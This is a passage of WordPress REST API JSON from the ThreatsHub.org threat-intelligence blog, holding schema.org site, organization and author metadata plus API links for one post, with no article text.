\u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57084"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57084\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/57085"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57084"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57084"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}